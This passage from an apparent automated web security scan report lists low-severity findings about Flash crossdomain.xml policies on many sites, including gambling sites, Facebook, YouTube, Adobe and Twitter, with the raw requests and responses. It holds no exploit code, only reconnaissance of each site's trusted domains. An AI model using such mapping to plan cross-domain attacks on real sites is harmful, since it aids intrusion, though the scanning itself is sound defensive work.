   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.115. http://svenskalotter.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://svenskalotter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: svenskalotter.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=scu5ro45cuuccb55o2c5o0i1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.116. http://video.google.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://video.google.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Fri, 13 May 2011 19:18:03 GMT
Expires: Sat, 12 May 2012 19:18:03 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 235056

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

4.117. http://www.adobe.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 14:18:48 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Mon, 16 May 2011 12:12:42 GMT
Age: 25
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

4.118. http://www.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=179
Expires: Mon, 16 May 2011 12:28:06 GMT
Date: Mon, 16 May 2011 12:25:07 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.119. http://www.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tpvchn45bnqsxc45rljjujq2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.120. http://www.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crazyscratch.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Mon, 03 May 2010 07:05:08 GMT
Accept-Ranges: bytes
ETag: "2634e3f68eeaca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:28 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.121. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.122.38
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.122. http://www.hopa.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hopa.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukyabx45wh2cfxiqewji3e45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.123. http://www.info.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.info.crazyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cq0fyp45txhjecif42orps55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.124. http://www.info.winnings.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.info.winnings.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.info.winnings.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c1tpkpek4vg34fvqv43ze155; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.125. http://www.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:42:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tsfv4k55mykvwh55l4ikkg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.126. http://www.maestrocard.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.maestrocard.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.maestrocard.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:07 GMT
Server: Apache
Last-Modified: Fri, 01 Oct 2010 08:45:01 GMT
ETag: "183-35cd3d40"
Accept-Ranges: bytes
Content-Length: 387
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mastercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.priceless.com" secure="false"/>
...[SNIP]...

4.127. http://www.mundirasca.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mundirasca.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5onbqbybv3buvyysplg5rsbe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.128. http://www.pclscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pclscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0kkc2r55aswcclrmbmi2u1vy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.129. http://www.primegrattage.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.primegrattage.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primegrattage.com

Response

HTTP/1.1 200 OK
Content-Length: 282
Content-Type: text/xml
Last-Modified: Mon, 04 Apr 2011 11:36:37 GMT
Accept-Ranges: bytes
ETag: "f640a48ebcf2cb1:357c"
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:00:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.primegrattage.com"/>
...[SNIP]...

4.130. http://www.primescratchcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primescratchcards.com

Response

HTTP/1.1 200 OK
Content-Length: 286
Content-Type: text/xml
Last-Modified: Thu, 31 Dec 2009 01:34:45 GMT
Accept-Ranges: bytes
ETag: "daca8c6eb989ca1:357c"
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:40:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.primescratchcards.com"/>
...[SNIP]...

4.131. http://www.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:42:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b0n2oe2sqagbhdjjwok3aibu; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.132. http://www.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fmhath45oq5kbhmig5dtx23g; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.133. http://www.svenskalotter.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.svenskalotter.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bxsmxwfaspjxf155faojjpub; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.134. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:08 GMT
ETag: "132-4a320373f0300"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.135. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:37 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1305550177246264; path=/; expires=Mon, 23-May-11 12:49:37 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Mon, 16 May 2011 13:19:37 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.136. https://casino.betsson.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://casino.betsson.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: casino.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:41:40 GMT
Last-Modified: Thu, 07 Apr 2011 10:52:45 GMT
Accept-Ranges: bytes
ETag: "1CBF511ED057C80"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:14:16 GMT
Connection: close
Content-Length: 461

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="cdn.betsson.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.137. https://games.betsson.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://games.betsson.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: games.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:48:30 GMT
Last-Modified: Tue, 25 Jan 2011 13:39:02 GMT
Accept-Ranges: bytes
ETag: "1CBBC953A08DF00"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:34:50 GMT
Connection: close
Content-Length: 633

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="s-cdn.betsson.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="t-cdn.betsson.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="cdn.betsson.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="betsson.hs.llnwd.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="ble.hs.llnwd.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="ble-cdn.betsson.com" secure="true"/>
...[SNIP]...

4.138. https://livecasino.betsson.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://livecasino.betsson.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: livecasino.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:30:39 GMT
Last-Modified: Tue, 08 Feb 2011 12:00:55 GMT
Accept-Ranges: bytes
ETag: "1CBC787D6E47580"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:10:22 GMT
Connection: close
Content-Length: 456

<?xml version="1.0" encoding="utf-8" ?>
